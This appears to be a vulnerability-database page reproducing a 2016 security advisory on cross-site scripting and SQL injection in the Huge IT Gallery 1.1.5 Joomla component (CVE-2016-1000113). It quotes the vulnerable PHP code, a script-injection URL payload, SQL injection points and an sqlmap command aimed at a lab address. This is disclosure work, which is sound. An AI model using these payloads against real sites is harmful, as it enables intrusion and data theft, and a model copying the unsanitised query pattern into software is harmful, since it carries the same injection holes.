Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLarry W. CashdollarPACKETSTORM:138027
HistoryJul 24, 2016 - 12:00 a.m.

Joomla Huge IT Gallery 1.1.5 Cross Site Scripting / SQL Injection

2016-07-2400:00:00
Larry W. Cashdollar
packetstormsecurity.com
29

0.013 Low

EPSS

Percentile

85.7%

JSON
`Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla  
Author: Larry W. Cashdollar, @_larry0 Elitza Neytcheva, @E1337za   
Date: 2016-07-14  
Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro  
Vendor: huge-it.com  
Vendor Notified: 2016-07-15, fixed v1.1.6  
Vendor Contact: [email protected]  
Advisory: http://www.vapidlabs.com/advisory.php?v=164  
Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links.  
Vulnerability:  
The attacker does not need to be logged in to Joomla to exploit this vulnerability:  
  
SQL in code via id parameter:  
./administrator/components/com_gallery/models/gallery.php  
51 public function getPropertie() {  
52 $db = JFactory::getDBO();  
53 $id_cat = JRequest::getVar('id');  
54 $query = $db->getQuery(true);  
55 $query->select('#__huge_itgallery_images.name as name,'  
56 . '#__huge_itgallery_images.id ,'  
57 . '#__huge_itgallery_gallerys.name as portName,'  
58 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itg allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');  
59 $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg allery_images'));  
60 $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat);  
61 $query->order('ordering desc');  
62   
64 $db->setQuery($query);  
65 $results = $db->loadObjectList();  
66 return $results;  
67 }  
  
XSS is here:  
  
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \;  
./administrator/components/com_gallery/views/gallery/tmpl/default.php  
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \;  
256: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" >  
CVE-2016-1000113  
Exploit Code:  
XSS PoC  
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E  
  
SQLi PoC  
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE  
  
http://192.168.0.125/index.php?option=com_gallery&id=HERE  
  
Video by 'Exploiter':  
https://www.youtube.com/watch?v=U67iQ3-xcho  
  
$ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql  
`

Related

cve 1
prion 1
cvelist 1
nvd 1
cve
cve
CVE-2016-1000113
2016-10-06 14:59:19
prion
prion
Design/Logic Flaw
2016-10-06 14:59:00
cvelist
cvelist
CVE-2016-1000113
2016-10-06 14:00:00
nvd
nvd
CVE-2016-1000113
2016-10-06 14:59:19

0.013 Low

EPSS

Percentile

85.7%

JSON
Related for PACKETSTORM:138027
cve1prion1cvelist1nvd1